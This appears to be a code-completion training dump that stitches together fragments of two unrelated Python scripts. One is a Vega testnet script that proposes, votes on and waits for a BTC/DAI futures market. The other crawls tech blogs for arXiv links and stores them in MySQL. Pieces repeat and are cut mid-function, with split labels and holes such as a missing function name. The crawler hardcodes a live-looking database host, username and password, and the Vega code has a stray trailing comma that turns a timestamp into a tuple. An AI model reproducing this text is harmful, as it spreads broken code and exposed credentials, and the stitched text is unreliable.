# Set closing/enactment and validation timestamps to valid time offsets
# from the current Vega blockchain time
closing_time = blockchain_time_seconds + 360
enactment_time = blockchain_time_seconds + 480
validation_time = blockchain_time_seconds + 1,
# The proposal command below contains the configuration for a new market
proposal = {
"proposalSubmission": {
"reference": proposal_ref,
"terms": {
"closingTimestamp": closing_time,
"enactmentTimestamp": enactment_time,
"validationTimestamp": validation_time,
"newMarket": {
"changes": {
"continuous": {
"tickSize": "0.01"
},
"decimalPlaces": 5,
"instrument": {
"code": "CRYPTO:BTCDAI/DEC22",
"future": {
"maturity": "2022-12-31T23:59:59Z",
"oracleSpec": {
"pubKeys": ["0x0000"],
"filters": [
{
"key": {
"name": "price.DAI.value",
"type": "TYPE_STRING",
},
"conditions": [
{
"operator": "OPERATOR_EQUALS",
"value": "5797800153",
},
],
},
],
},
"oracleSpecBinding": {
"settlementPriceProperty": "price.DAI.value"
},
"quoteName": "tDAI",
"settlementAsset": found_asset_id,
},
"name": "BTC/DAI (2022, tDAI)"
},
"metadata": [
"base:BTC",
"quote:DAI",
],
"liquidityMonitoringParameters": {
"targetStakeParameters": {
"timeWindow": 3600,
"scalingFactor": 10,
},
"triggeringRatio": 0,
"auctionExtension": 0,
},
"logNormal": {
"riskAversionParameter": 0.01,
"tau": 1.90128526884173e-06,
"params": {"mu": 0, "r": 0.016, "sigma": 0.05},
},
},
"liquidityCommitment": {
"commitmentAmount": 1,
"fee": "0.01",
"sells": [
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 2000,
},
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 1000,
},
],
"buys": [
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -1000,
},
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -2000,
},
],
"reference": "",
},
}
}
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_propose_market__
print("Market proposal: ", proposal)
# __sign_tx_proposal:
# Sign the new market proposal transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=proposal)
helpers.check_response(response)
# :sign_tx_proposal__
print("Signed market proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
# Wait for proposal to be included in a block and to be accepted by Vega
# network
print("Waiting for blockchain...", end="", flush=True)
proposal_id = ""
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
proposal_id = n["proposal"]["id"]
print()
print("Your proposal has been accepted by the network")
print(n)
done = True
break
assert proposal_id != ""
###############################################################################
# V O T E O N M A R K E T #
###############################################################################
# STEP 2 - Let's vote on the market proposal
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. This is because of the network minimum threshold for voting on
# proposals, this threshold for market proposals this is currently a 66%
# majority vote either YES or NO.
# A proposer should enlist the help/YES votes from other community members,
# ideally on the Community forums (https://community.vega.xyz/c/testnet) or
# Discord (https://vega.xyz/discord)
# Further documentation on proposal voting and review here:
# https://docs.testnet.vega.xyz/docs/api-howtos/proposals/
# __prepare_vote:
# Create a vote message, to vote on the proposal
vote = {
"voteSubmission": {
"value": "VALUE_YES", # Can be either VALUE_YES or VALUE_NO
"proposalId": proposal_id,
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_vote__
# Debugging
# print("Vote submission:\n", vote, "\n")
# __sign_tx_vote:
# Sign the vote transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=vote)
helpers.check_response(response)
# :sign_tx_vote__
print("Signed vote on proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
print("Waiting for vote on proposal to succeed or fail...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
if n["proposal"]["state"] != "STATE_OPEN":
print(n["proposal"]["state"])
if n["proposal"]["state"] == "STATE_ENACTED":
done = True
break
elif n["proposal"]["state"] == "STATE_PASSED":
print("proposal vote has succeeded, waiting for enactment")
else:
print(n)
exit(1)
###############################################################################
# W A I T F O R M A R K E T #
###############################################################################
# STEP 3 - Wait for market to be enacted
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. As described above in STEP 2, a market will need community voting
# support to be passed and then enacted.
# __wait_for_market:
print("Waiting for proposal to be enacted or failed...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
markets = requests.get(node_url_rest + "/markets")
if markets.status_code != 200:
continue
for n in markets.json()["markets"]:
if n["id"] == proposal_id:
print()
print(n)
done = True
break
# :wait_for_market__
# Completed. | random_line_split | |
propose-vote-enact-market.py | #!/usr/bin/python3
"""
Script language: Python3
Talks to:
- Vega node (REST)
- Vega wallet (REST)
Apps/Libraries:
- REST: requests (https://pypi.org/project/requests/)
"""
# Note: this file uses smart-tags in comments to section parts of the code to
# show them as snippets in our documentation. They are not necessary to be
# included when creating your own custom code.
#
# Example of smart-tags:
# __something:
# some code here
# :something__
import requests
import time
import os
import helpers
import uuid
node_url_rest = os.getenv("NODE_URL_REST")
if not helpers.check_url(node_url_rest):
print("Error: Invalid or missing NODE_URL_REST environment variable.")
exit(1)
wallet_server_url = os.getenv("WALLETSERVER_URL")
wallet_name = os.getenv("WALLET_NAME")
if not helpers.check_var(wallet_name):
print("Error: Invalid or missing WALLET_NAME environment variable.")
exit(1)
wallet_passphrase = os.getenv("WALLET_PASSPHRASE")
if not helpers.check_var(wallet_passphrase):
print("Error: Invalid or missing WALLET_PASSPHRASE environment variable.")
exit(1)
# Help guide users against including api version suffix on url
wallet_server_url = helpers.check_wallet_url(wallet_server_url)
###############################################################################
# W A L L E T S E R V I C E #
###############################################################################
print(f"Logging into wallet: {wallet_name}")
# __login_wallet:
# Log in to an existing wallet
req = {"wallet": wallet_name, "passphrase": wallet_passphrase}
response = requests.post(f"{wallet_server_url}/api/v1/auth/token", json=req)
helpers.check_response(response)
token = response.json()["token"]
# :login_wallet__
assert token != ""
print("Logged in to wallet successfully")
# __get_pubkey:
# List key pairs and select public key to use
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(f"{wallet_server_url}/api/v1/keys", headers=headers)
helpers.check_response(response)
keys = response.json()["keys"]
pubkey = keys[0]["pub"]
# :get_pubkey__
assert pubkey != ""
print("Selected pubkey for signing")
###############################################################################
# F I N D A S S E T S #
###############################################################################
# __get_assets:
# Request a list of assets available on a Vega network
url = f"{node_url_rest}/assets"
response = requests.get(url)
helpers.check_response(response)
# :get_assets__
# Debugging
# print("Assets:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
# __find_asset:
# Find settlement asset with name tDAI
found_asset_id = "UNKNOWN"
assets = response.json()["assets"]
for asset in assets:
if asset["details"]["symbol"] == "tDAI":
print("Found an asset with symbol tDAI")
print(asset)
found_asset_id = asset["id"]
break
# :find_asset__
if found_asset_id == "UNKNOWN":
print(
"tDAI asset not found on specified Vega network, please propose and "
"create this asset first"
)
exit(1)
###############################################################################
# G O V E R N A N C E T O K E N C H E C K #
###############################################################################
# Get the identifier of the governance asset on the Vega network
vote_asset_id = "UNKNOWN"
for asset in assets:
if asset["details"]["symbol"] == "tVOTE":
vote_asset_id = asset["id"]
break
if vote_asset_id == "UNKNOWN":
print(
"tVOTE asset not found on specified Vega network, please symbol name "
"check and try again"
)
exit(1)
# Request accounts for party and check governance asset balance
url = f"{node_url_rest}/parties/{pubkey}/accounts"
response = requests.get(url)
helpers.check_response(response)
# Debugging
# print("Accounts:\n{}".format(
# json.dumps(response.json(), indent=2, sort_keys=True)))
voting_balance = 0
accounts = response.json()["accounts"]
for account in accounts:
if account["asset"] == vote_asset_id:
print("Found governance asset account")
print(account)
voting_balance = account["balance"]
break
if voting_balance == 0:
print(f"Please deposit tVOTE asset to public key {pubkey} and try again")
exit(1)
###############################################################################
# B L O C K C H A I N T I M E #
###############################################################################
# __get_time:
# Request the current blockchain time, and convert to time in seconds
response = requests.get(f"{node_url_rest}/time")
helpers.check_response(response)
blockchain_time = int(response.json()["timestamp"])
blockchain_time_seconds = int(blockchain_time / 1e9) # Seconds precision
# :get_time__
assert blockchain_time > 0
assert blockchain_time_seconds > 0
print(
f"Blockchain time: {blockchain_time} ({blockchain_time_seconds} seconds "
"past epoch)"
)
###############################################################################
# P R O P O S E M A R K E T #
###############################################################################
# STEP 1 - Propose a BTC/DAI futures market
# Further documentation on creating markets:
# https://docs.testnet.vega.xyz/docs/api-howtos/create-market/
# __prepare_propose_market:
# Compose a governance proposal for a new market
proposal_ref = f"{pubkey}-{uuid.uuid4()}"
# Set closing/enactment and validation timestamps to valid time offsets
# from the current Vega blockchain time
closing_time = blockchain_time_seconds + 360
enactment_time = blockchain_time_seconds + 480
validation_time = blockchain_time_seconds + 1,
# The proposal command below contains the configuration for a new market
proposal = {
"proposalSubmission": {
"reference": proposal_ref,
"terms": {
"closingTimestamp": closing_time,
"enactmentTimestamp": enactment_time,
"validationTimestamp": validation_time,
"newMarket": {
"changes": {
"continuous": {
"tickSize": "0.01"
},
"decimalPlaces": 5,
"instrument": {
"code": "CRYPTO:BTCDAI/DEC22",
"future": {
"maturity": "2022-12-31T23:59:59Z",
"oracleSpec": {
"pubKeys": ["0x0000"],
"filters": [
{
"key": {
"name": "price.DAI.value",
"type": "TYPE_STRING",
},
"conditions": [
{
"operator": "OPERATOR_EQUALS",
"value": "5797800153",
},
],
},
],
},
"oracleSpecBinding": {
"settlementPriceProperty": "price.DAI.value"
},
"quoteName": "tDAI",
"settlementAsset": found_asset_id,
},
"name": "BTC/DAI (2022, tDAI)"
},
"metadata": [
"base:BTC",
"quote:DAI",
],
"liquidityMonitoringParameters": {
"targetStakeParameters": {
"timeWindow": 3600,
"scalingFactor": 10,
},
"triggeringRatio": 0,
"auctionExtension": 0,
},
"logNormal": {
"riskAversionParameter": 0.01,
"tau": 1.90128526884173e-06,
"params": {"mu": 0, "r": 0.016, "sigma": 0.05},
},
},
"liquidityCommitment": {
"commitmentAmount": 1,
"fee": "0.01",
"sells": [
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 2000,
},
{
"reference": "PEGGED_REFERENCE_BEST_ASK",
"proportion": 10,
"offset": 1000,
},
],
"buys": [
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -1000,
},
{
"reference": "PEGGED_REFERENCE_BEST_BID",
"proportion": 10,
"offset": -2000,
},
],
"reference": "",
},
}
}
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_propose_market__
print("Market proposal: ", proposal)
# __sign_tx_proposal:
# Sign the new market proposal transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=proposal)
helpers.check_response(response)
# :sign_tx_proposal__
print("Signed market proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
# Wait for proposal to be included in a block and to be accepted by Vega
# network
print("Waiting for blockchain...", end="", flush=True)
proposal_id = ""
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
|
assert proposal_id != ""
###############################################################################
# V O T E O N M A R K E T #
###############################################################################
# STEP 2 - Let's vote on the market proposal
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. This is because of the network minimum threshold for voting on
# proposals, this threshold for market proposals this is currently a 66%
# majority vote either YES or NO.
# A proposer should enlist the help/YES votes from other community members,
# ideally on the Community forums (https://community.vega.xyz/c/testnet) or
# Discord (https://vega.xyz/discord)
# Further documentation on proposal voting and review here:
# https://docs.testnet.vega.xyz/docs/api-howtos/proposals/
# __prepare_vote:
# Create a vote message, to vote on the proposal
vote = {
"voteSubmission": {
"value": "VALUE_YES", # Can be either VALUE_YES or VALUE_NO
"proposalId": proposal_id,
},
"pubKey": pubkey,
"propagate": True
}
# :prepare_vote__
# Debugging
# print("Vote submission:\n", vote, "\n")
# __sign_tx_vote:
# Sign the vote transaction
# Note: Setting propagate to true will also submit to a Vega node
url = f"{wallet_server_url}/api/v1/command/sync"
response = requests.post(url, headers=headers, json=vote)
helpers.check_response(response)
# :sign_tx_vote__
print("Signed vote on proposal and sent to Vega")
# Debugging
# print("Signed transaction:\n", response.json(), "\n")
print("Waiting for vote on proposal to succeed or fail...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
my_proposals = requests.get(
node_url_rest + "/parties/" + pubkey + "/proposals"
)
if my_proposals.status_code != 200:
continue
for n in my_proposals.json()["data"]:
if n["proposal"]["reference"] == proposal_ref:
if n["proposal"]["state"] != "STATE_OPEN":
print(n["proposal"]["state"])
if n["proposal"]["state"] == "STATE_ENACTED":
done = True
break
elif n["proposal"]["state"] == "STATE_PASSED":
print("proposal vote has succeeded, waiting for enactment")
else:
print(n)
exit(1)
###############################################################################
# W A I T F O R M A R K E T #
###############################################################################
# STEP 3 - Wait for market to be enacted
# IMPORTANT: When voting for a proposal on the Vega Testnet, typically a single
# YES vote from the proposer will not be enough to vote the market into
# existence. As described above in STEP 2, a market will need community voting
# support to be passed and then enacted.
# __wait_for_market:
print("Waiting for proposal to be enacted or failed...", end="", flush=True)
done = False
while not done:
time.sleep(0.5)
print(".", end="", flush=True)
markets = requests.get(node_url_rest + "/markets")
if markets.status_code != 200:
continue
for n in markets.json()["markets"]:
if n["id"] == proposal_id:
print()
print(n)
done = True
break
# :wait_for_market__
# Completed.
| if n["proposal"]["reference"] == proposal_ref:
proposal_id = n["proposal"]["id"]
print()
print("Your proposal has been accepted by the network")
print(n)
done = True
break | conditional_block |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def | ():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| crawl_medium | identifier_name |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
